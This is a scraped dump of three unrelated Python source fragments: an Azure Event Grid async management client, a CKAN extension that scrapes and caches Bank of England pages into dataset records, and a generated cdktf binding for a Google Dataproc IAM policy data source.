                headers=_headers,
                params=_params,
                **kwargs
            )
        # error_map was only meaningful for the initial call; drop it before
        # the remaining kwargs are forwarded to the polling method.
        kwargs.pop("error_map", None)
        def get_long_running_output(pipeline_response):  # pylint: disable=inconsistent-return-statements
            # Delete produces no body; only invoke the custom deserializer hook.
            if cls:
                return cls(pipeline_response, None, {})
        if polling is True:
            polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
        elif polling is False:
            polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
        else:
            # Caller supplied a fully initialized polling object.
            polling_method = polling
        if cont_token:
            # Resume a previously started operation from its saved state.
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)  # type: ignore
    begin_delete.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}"
    }
async def _update_initial(
self,
resource_group_name: str,
domain_name: str,
topic_name: str,
event_subscription_name: str,
event_subscription_update_parameters: Union[_models.EventSubscriptionUpdateParameters, IO],
**kwargs: Any
) -> _models.EventSubscription:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-06-15"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.EventSubscription] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(event_subscription_update_parameters, (IO, bytes)):
_content = event_subscription_update_parameters
else:
_json = self._serialize.body(event_subscription_update_parameters, "EventSubscriptionUpdateParameters")
request = build_update_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
topic_name=topic_name,
event_subscription_name=event_subscription_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("EventSubscription", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}"
}
    # Overload: accepts a typed EventSubscriptionUpdateParameters model body.
    @overload
    async def begin_update(
        self,
        resource_group_name: str,
        domain_name: str,
        topic_name: str,
        event_subscription_name: str,
        event_subscription_update_parameters: _models.EventSubscriptionUpdateParameters,
        *,
        content_type: str = "application/json",
        **kwargs: Any
    ) -> AsyncLROPoller[_models.EventSubscription]:
        """Update a nested event subscription for a domain topic.
        Update an existing event subscription for a domain topic.
        :param resource_group_name: The name of the resource group within the user's subscription.
         Required.
        :type resource_group_name: str
        :param domain_name: Name of the domain. Required.
        :type domain_name: str
        :param topic_name: Name of the topic. Required.
        :type topic_name: str
        :param event_subscription_name: Name of the event subscription to be updated. Required.
        :type event_subscription_name: str
        :param event_subscription_update_parameters: Updated event subscription information. Required.
        :type event_subscription_update_parameters:
         ~azure.mgmt.eventgrid.models.EventSubscriptionUpdateParameters
        :keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
         Default value is "application/json".
        :paramtype content_type: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either EventSubscription or the result of
         cls(response)
        :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.eventgrid.models.EventSubscription]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
    # Overload: accepts a raw IO stream body (pre-serialized JSON).
    @overload
    async def begin_update(
        self,
        resource_group_name: str,
        domain_name: str,
        topic_name: str,
        event_subscription_name: str,
        event_subscription_update_parameters: IO,
        *,
        content_type: str = "application/json",
        **kwargs: Any
    ) -> AsyncLROPoller[_models.EventSubscription]:
        """Update a nested event subscription for a domain topic.
        Update an existing event subscription for a domain topic.
        :param resource_group_name: The name of the resource group within the user's subscription.
         Required.
        :type resource_group_name: str
        :param domain_name: Name of the domain. Required.
        :type domain_name: str
        :param topic_name: Name of the topic. Required.
        :type topic_name: str
        :param event_subscription_name: Name of the event subscription to be updated. Required.
        :type event_subscription_name: str
        :param event_subscription_update_parameters: Updated event subscription information. Required.
        :type event_subscription_update_parameters: IO
        :keyword content_type: Body Parameter content-type. Content type parameter for binary body.
         Default value is "application/json".
        :paramtype content_type: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either EventSubscription or the result of
         cls(response)
        :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.eventgrid.models.EventSubscription]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
    @distributed_trace_async
    async def begin_update(
        self,
        resource_group_name: str,
        domain_name: str,
        topic_name: str,
        event_subscription_name: str,
        event_subscription_update_parameters: Union[_models.EventSubscriptionUpdateParameters, IO],
        **kwargs: Any
    ) -> AsyncLROPoller[_models.EventSubscription]:
        """Update a nested event subscription for a domain topic.
        Update an existing event subscription for a domain topic.
        :param resource_group_name: The name of the resource group within the user's subscription.
         Required.
        :type resource_group_name: str
        :param domain_name: Name of the domain. Required.
        :type domain_name: str
        :param topic_name: Name of the topic. Required.
        :type topic_name: str
        :param event_subscription_name: Name of the event subscription to be updated. Required.
        :type event_subscription_name: str
        :param event_subscription_update_parameters: Updated event subscription information. Is either
         a model type or a IO type. Required.
        :type event_subscription_update_parameters:
         ~azure.mgmt.eventgrid.models.EventSubscriptionUpdateParameters or IO
        :keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
         Default value is None.
        :paramtype content_type: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either EventSubscription or the result of
         cls(response)
        :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.eventgrid.models.EventSubscription]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        # Pin the service API version; callers may override via kwargs or query params.
        api_version: Literal["2022-06-15"] = kwargs.pop(
            "api_version", _params.pop("api-version", self._config.api_version)
        )
        content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
        cls: ClsType[_models.EventSubscription] = kwargs.pop("cls", None)
        polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token: Optional[str] = kwargs.pop("continuation_token", None)
        if cont_token is None:
            # First call: fire the initial PATCH and keep the raw pipeline
            # response (identity cls lambda) so the poller can drive the LRO.
            raw_result = await self._update_initial(
                resource_group_name=resource_group_name,
                domain_name=domain_name,
                topic_name=topic_name,
                event_subscription_name=event_subscription_name,
                event_subscription_update_parameters=event_subscription_update_parameters,
                api_version=api_version,
                content_type=content_type,
                cls=lambda x, y, z: x,
                headers=_headers,
                params=_params,
                **kwargs
            )
        # error_map was only meaningful for the initial call; drop it before
        # the remaining kwargs are forwarded to the polling method.
        kwargs.pop("error_map", None)
        def get_long_running_output(pipeline_response):
            # Deserialize the final response once polling completes.
            deserialized = self._deserialize("EventSubscription", pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True:
            polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
        elif polling is False:
            polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
        else:
            # Caller supplied a fully initialized polling object.
            polling_method = polling
        if cont_token:
            # Resume a previously started operation from its saved state.
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)  # type: ignore
    begin_update.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}"
    }
@distributed_trace_async
async def get_full_url(
self, resource_group_name: str, domain_name: str, topic_name: str, event_subscription_name: str, **kwargs: Any
) -> _models.EventSubscriptionFullUrl:
"""Get full URL of a nested event subscription for domain topic.
Get the full endpoint URL for a nested event subscription for domain topic.
:param resource_group_name: The name of the resource group within the user's subscription.
Required.
:type resource_group_name: str
:param domain_name: Name of the top level domain. Required.
:type domain_name: str
:param topic_name: Name of the domain topic. Required.
:type topic_name: str
:param event_subscription_name: Name of the event subscription. Required.
:type event_subscription_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: EventSubscriptionFullUrl or the result of cls(response)
:rtype: ~azure.mgmt.eventgrid.models.EventSubscriptionFullUrl
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-06-15"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.EventSubscriptionFullUrl] = kwargs.pop("cls", None)
request = build_get_full_url_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
topic_name=topic_name,
event_subscription_name=event_subscription_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_full_url.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("EventSubscriptionFullUrl", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_full_url.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}/getFullUrl"
}
    @distributed_trace
    def list(
        self,
        resource_group_name: str,
        domain_name: str,
        topic_name: str,
        filter: Optional[str] = None,
        top: Optional[int] = None,
        **kwargs: Any
    ) -> AsyncIterable["_models.EventSubscription"]:
        """List all nested event subscriptions for a specific domain topic.
        List all event subscriptions that have been created for a specific domain topic.
        :param resource_group_name: The name of the resource group within the user's subscription.
         Required.
        :type resource_group_name: str
        :param domain_name: Name of the top level domain. Required.
        :type domain_name: str
        :param topic_name: Name of the domain topic. Required.
        :type topic_name: str
        :param filter: The query used to filter the search results using OData syntax. Filtering is
         permitted on the 'name' property only and with limited number of OData operations. These
         operations are: the 'contains' function as well as the following logical operations: not, and,
         or, eq (for equal), and ne (for not equal). No arithmetic operations are supported. The
         following is a valid filter example: $filter=contains(namE, 'PATTERN') and name ne 'PATTERN-1'.
         The following is not a valid filter example: $filter=location eq 'westus'. Default value is
         None.
        :type filter: str
        :param top: The number of results to return per page for the list operation. Valid range for
         top parameter is 1 to 100. If not specified, the default number of results to be returned is 20
         items per page. Default value is None.
        :type top: int
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either EventSubscription or the result of cls(response)
        :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.eventgrid.models.EventSubscription]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        # Pin the service API version; callers may override via kwargs or query params.
        api_version: Literal["2022-06-15"] = kwargs.pop(
            "api_version", _params.pop("api-version", self._config.api_version)
        )
        cls: ClsType[_models.EventSubscriptionsListResult] = kwargs.pop("cls", None)
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})
        def prepare_request(next_link=None):
            # First page uses the templated list URL; subsequent pages follow
            # the server-provided nextLink verbatim (with api-version re-applied).
            if not next_link:
                request = build_list_request(
                    resource_group_name=resource_group_name,
                    domain_name=domain_name,
                    topic_name=topic_name,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    top=top,
                    api_version=api_version,
                    template_url=self.list.metadata["url"],
                    headers=_headers,
                    params=_params,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                # make call to next link with the client's api-version
                _parsed_next_link = urllib.parse.urlparse(next_link)
                # Re-encode the nextLink's query parameters so they survive the
                # round-trip through HttpRequest unchanged.
                _next_request_params = case_insensitive_dict(
                    {
                        key: [urllib.parse.quote(v) for v in value]
                        for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
                    }
                )
                _next_request_params["api-version"] = self._config.api_version
                request = HttpRequest(
                    "GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request
        async def extract_data(pipeline_response):
            # Unpack one page: (link-to-next-page, async iterator of items).
            deserialized = self._deserialize("EventSubscriptionsListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)  # type: ignore
            return deserialized.next_link or None, AsyncList(list_of_elem)
        async def get_next(next_link=None):
            # Fetch a single page and fail fast on non-200 responses.
            request = prepare_request(next_link)
            pipeline_response: PipelineResponse = await self._client._pipeline.run(  # pylint: disable=protected-access
                request, stream=False, **kwargs
            )
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return AsyncItemPaged(get_next, extract_data)
    list.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions"
    }
@distributed_trace_async
async def get_delivery_attributes(
self, resource_group_name: str, domain_name: str, topic_name: str, event_subscription_name: str, **kwargs: Any
) -> _models.DeliveryAttributeListResult:
"""Get delivery attributes for an event subscription for domain topic.
Get all delivery attributes for an event subscription for domain topic.
:param resource_group_name: The name of the resource group within the user's subscription.
Required.
:type resource_group_name: str
:param domain_name: Name of the top level domain. Required.
:type domain_name: str
:param topic_name: Name of the domain topic. Required.
:type topic_name: str
:param event_subscription_name: Name of the event subscription. Required.
:type event_subscription_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeliveryAttributeListResult or the result of cls(response)
:rtype: ~azure.mgmt.eventgrid.models.DeliveryAttributeListResult
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-06-15"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.DeliveryAttributeListResult] = kwargs.pop("cls", None)
request = build_get_delivery_attributes_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
topic_name=topic_name,
event_subscription_name=event_subscription_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_delivery_attributes.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("DeliveryAttributeListResult", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_delivery_attributes.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}/getDeliveryAttributes"
}
|
PypiClean
|
/ckanext_boe-0.0.2-py3-none-any.whl/ckanext/boe/utils/scrap.py
|
from __future__ import annotations
import mimetypes
import logging
import tempfile
from typing import Any, Iterable, Optional
import enum
import uuid
import requests
from pathlib import Path
from pathlib import Path
from urllib.parse import urlparse, parse_qs, urlencode, parse_qsl
from markdownify import markdownify
from bs4 import BeautifulSoup
log = logging.getLogger(__name__)
# Scraped pages are cached on disk under the system temp directory so repeated
# runs do not re-download the same URLs.
tmp_root = Path(tempfile.gettempdir())
cache = tmp_root / "ckanext-pages"
# SOCKS proxy used when download_into() is called with use_proxy=True.
# NOTE(review): hard-coded localhost:2001 — presumably a local tunnel; confirm.
proxies = dict(http='socks5://127.0.0.1:2001', https='socks5://127.0.0.1:2001')
if not cache.exists():
    log.debug("Create cache folder at %s", cache)
    cache.mkdir()
# Base URL of the site being scraped; individual paths are grafted onto it.
URL = urlparse("https://www.bankofengland.co.uk")
def download_into(url: str, dest: Path, params: dict[str, str], use_proxy: bool = False, timeout: Optional[float] = None):
    """Stream *url* into the file *dest*.

    :param url: absolute URL to fetch.
    :param dest: file the response body is written to (overwritten).
    :param params: query-string parameters for the request.
    :param use_proxy: route the request through the module-level SOCKS ``proxies``.
    :param timeout: optional requests timeout in seconds; ``None`` (the
        default) preserves the original unbounded behavior.
    :raises requests.HTTPError: on a non-2xx response.
    """
    # Use the response as a context manager: with stream=True the connection
    # is only released back to the pool once the response is closed, and the
    # original code never closed it.
    with requests.get(
        url,
        stream=True,
        proxies=proxies if use_proxy else {},
        params=params,
        headers={"user-agent": "python"},
        timeout=timeout,
    ) as resp:
        resp.raise_for_status()
        with dest.open("wb") as fp:
            for chunk in resp.iter_content(1024):
                fp.write(chunk)
def dig(root: str):
    """Depth-first crawl starting at *root*, yielding each unvisited Page.

    Pages that have already been visited are skipped, which both deduplicates
    output and guards against cycles in the site's section links.
    """
    parts = urlparse(root)
    query = dict(parse_qsl(parts.query))
    page = get_page(URL._replace(path=parts.path).geturl(), query)
    if page.visited:
        return
    page.visit()
    yield page
    # Only section pages advertise further sub-links worth following.
    if page.type.is_(PageType.section):
        for child_href in page.sub_links():
            yield from dig(child_href)
def get_page(url: str, params: dict[str, str], use_proxy: bool = False):
    """Return the Page for *url* + *params*, downloading it into the on-disk
    cache on first access and reusing the in-memory Page on later ones.

    The cache key is a UUIDv3 of the URL plus the sorted query parameters, so
    parameter order does not produce duplicate cache entries.
    """
    # sorted() already returns a list, so the original list(sorted(...)) was
    # redundant; the repr — and therefore every existing cache key — is
    # unchanged by dropping it.
    key = str([url, sorted(params.items())])
    key = str(uuid.uuid3(uuid.NAMESPACE_URL, key))
    source = cache / key
    old = Page.lookup(source)
    if old:
        log.debug("Re-visiting %s", url)
        return old
    if not source.exists():
        log.debug("Create cache %s for %s", key, url)
        download_into(url, source, params, use_proxy)
    else:
        log.debug("Load cache %s for %s", key, url)
    return Page(source, url)
class PageType(enum.Flag):
    """Bit flags classifying what a scraped page contains.

    A page may carry several flags at once (e.g. a section that also holds
    package data).
    """

    page = enum.auto()
    section = enum.auto()
    package = enum.auto()
    resource = enum.auto()

    def is_(self, type: PageType):
        """Return a truthy flag value when *type* is present in this set."""
        return type & self
class Page:
    """A scraped, disk-cached HTML page and the dataset info extracted from it."""

    # Maps cache-file Path -> Page instance so each cached file is parsed at
    # most once per process (class-level, shared by all instances).
    __cache = {}
    # False at class level; visit() shadows it with True on the instance.
    visited = False
    @classmethod
    def lookup(cls, source: Path):
        """Return the already-parsed Page for cache file *source*, else None."""
        if source in cls.__cache:
            return cls.__cache[source]
    def __init__(self, source: Path, url: str):
        """Parse the cached HTML file *source* that was fetched from *url*."""
        self.url = url
        with source.open("rb") as fp:
            # NOTE(review): no parser name is passed, so BeautifulSoup picks
            # the "best available" installed parser — results can differ
            # between environments. Consider pinning one; confirm first.
            self.dom = BeautifulSoup(fp)
        # Register in the class-level cache so Page.lookup() finds us.
        self.__cache[source] = self
    def visit(self):
        """Mark this page as seen (instance attribute shadows the class-level
        ``visited = False``) so dig() will not traverse it again."""
        self.visited = True
@property
def type(self) -> PageType:
type = PageType.page
if self.has_sub_links():
type |= PageType.section
if self.has_package_data():
type |= PageType.package
return type
def has_sub_links(self):
return len(self.dom.select(".sub-links .sub-links-link")) > 0
def sub_links(self) -> dict[str, str]:
return {
str(link["href"]): link.text
for link in self.dom.select(".sub-links .sub-links-link")
}
def has_package_data(self) -> bool:
# TODO: implement
return bool(self.package_data())
def package_data(self) -> Iterable[dict[str, Any]]:
content = self.dom.select(".page-section .content-block")
for block in content:
data = self._block_to_dataset(block)
if data:
yield data
def _block_to_dataset(self, block) -> Optional[dict[str, Any]]:
import ckan.lib.munge as munge
h2 = block.h2
if not h2:
return
resources = self._resources_from_block(block)
for media_block in self.dom.select(".page-section .content-block"):
if block == media_block:
continue
resources.extend(self._media_resources_from_block(media_block))
data = {
"title": self.dom.body.h1.text + " - " + h2.text,
"notes": markdownify("".join(map(str, block.select("h2 ~ p")))),
"url": self.url,
"resources": resources,
}
data["name"] = munge.munge_title_to_name(data["title"])
return data
def _media_resources_from_block(self, block):
links = [a for a in block.select('a[href*="/media/"]')]
resources = []
for link in links:
resource = self._link_into_resource(link)
resource["description"] = markdownify(str(block))
resources.append(resource)
return resources
def _resources_from_block(self, block):
links = [a for a in block.select(f'a[href^="{URL.geturl()}"]')]
resources = []
for link in links:
resource = self._link_into_resource(link)
resources.append(resource)
url = urlparse(resource["url"])
if url.path.startswith("/boeapps/database"):
qs = parse_qs(url.query)
if "html.x" in qs:
qs["csv.x"] = qs.pop("html.x")
qs["CSVF"] = ["CN"]
resources.append(
{
"name": resource["name"],
"url": url._replace(
scheme=URL.scheme,
netloc=URL.netloc,
path=url.path.replace("/database/", "/iadb/"),
query=urlencode(qs, True),
).geturl(),
"format": "CSV",
}
)
return resources
def _link_into_resource(self, link):
import ckan.plugins.toolkit as tk
href = link["href"]
assert isinstance(href, str)
url = urlparse(href)
mime, _enc = mimetypes.guess_type(url.path)
if mime:
fmt = tk.h.unified_resource_format(mime)
else:
if url.path.endswith(".asp"):
fmt = "URL"
else:
fmt = tk.h.unified_resource_format("application/octet-stream")
return {
"name": link.text,
"url": url._replace(scheme=URL.scheme, netloc=URL.netloc).geturl(),
"format": fmt,
}
|
PypiClean
|
/cdktf-cdktf-provider-google_beta-9.0.1.tar.gz/cdktf-cdktf-provider-google_beta-9.0.1/src/cdktf_cdktf_provider_google_beta/data_google_dataproc_cluster_iam_policy/__init__.py
|
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
from typeguard import check_type
from .._jsii import *
import cdktf as _cdktf_9a9027ec
import constructs as _constructs_77d1e7e8
class DataGoogleDataprocClusterIamPolicy(
    _cdktf_9a9027ec.TerraformDataSource,
    metaclass=jsii.JSIIMeta,
    jsii_type="@cdktf/provider-google-beta.dataGoogleDataprocClusterIamPolicy.DataGoogleDataprocClusterIamPolicy",
):
    '''Represents a {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy google_dataproc_cluster_iam_policy}.'''

    # NOTE: jsii-generated binding. Method names, @jsii.member annotations and
    # the type-checking stubs mirror the underlying TypeScript construct and
    # are introspected by jsii at runtime — edit comments only, not structure.

    def __init__(
        self,
        scope: _constructs_77d1e7e8.Construct,
        id_: builtins.str,
        *,
        cluster: builtins.str,
        id: typing.Optional[builtins.str] = None,
        project: typing.Optional[builtins.str] = None,
        region: typing.Optional[builtins.str] = None,
        connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
        count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
        depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
        for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
        lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
        provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
        provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
    ) -> None:
        '''Create a new {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy google_dataproc_cluster_iam_policy} Data Source.

        :param scope: The scope in which to define this construct.
        :param id_: The scoped construct ID. Must be unique amongst siblings in the same scope
        :param cluster: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#cluster DataGoogleDataprocClusterIamPolicy#cluster}.
        :param id: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#id DataGoogleDataprocClusterIamPolicy#id}. Please be aware that the id field is automatically added to all resources in Terraform providers using a Terraform provider SDK version below 2. If you experience problems setting this value it might not be settable. Please take a look at the provider documentation to ensure it should be settable.
        :param project: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#project DataGoogleDataprocClusterIamPolicy#project}.
        :param region: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#region DataGoogleDataprocClusterIamPolicy#region}.
        :param connection:
        :param count:
        :param depends_on:
        :param for_each:
        :param lifecycle:
        :param provider:
        :param provisioners:
        '''
        if __debug__:
            # Runtime argument validation: annotations are read back from the
            # matching module-level stub via typing.get_type_hints().
            type_hints = typing.get_type_hints(_typecheckingstub__cbdfc1f5a161228c95adde0ef989c835403cd8a2a6d7d35d4a6f667c9742957c)
            check_type(argname="argument scope", value=scope, expected_type=type_hints["scope"])
            check_type(argname="argument id_", value=id_, expected_type=type_hints["id_"])
        config = DataGoogleDataprocClusterIamPolicyConfig(
            cluster=cluster,
            id=id,
            project=project,
            region=region,
            connection=connection,
            count=count,
            depends_on=depends_on,
            for_each=for_each,
            lifecycle=lifecycle,
            provider=provider,
            provisioners=provisioners,
        )
        jsii.create(self.__class__, self, [scope, id_, config])

    # --- optional-attribute resets -------------------------------------------

    @jsii.member(jsii_name="resetId")
    def reset_id(self) -> None:
        return typing.cast(None, jsii.invoke(self, "resetId", []))

    @jsii.member(jsii_name="resetProject")
    def reset_project(self) -> None:
        return typing.cast(None, jsii.invoke(self, "resetProject", []))

    @jsii.member(jsii_name="resetRegion")
    def reset_region(self) -> None:
        return typing.cast(None, jsii.invoke(self, "resetRegion", []))

    @jsii.member(jsii_name="synthesizeAttributes")
    def _synthesize_attributes(self) -> typing.Mapping[builtins.str, typing.Any]:
        return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "synthesizeAttributes", []))

    @jsii.python.classproperty
    @jsii.member(jsii_name="tfResourceType")
    def TF_RESOURCE_TYPE(cls) -> builtins.str:
        return typing.cast(builtins.str, jsii.sget(cls, "tfResourceType"))

    # --- computed (read-only) attributes -------------------------------------

    @builtins.property
    @jsii.member(jsii_name="etag")
    def etag(self) -> builtins.str:
        return typing.cast(builtins.str, jsii.get(self, "etag"))

    @builtins.property
    @jsii.member(jsii_name="policyData")
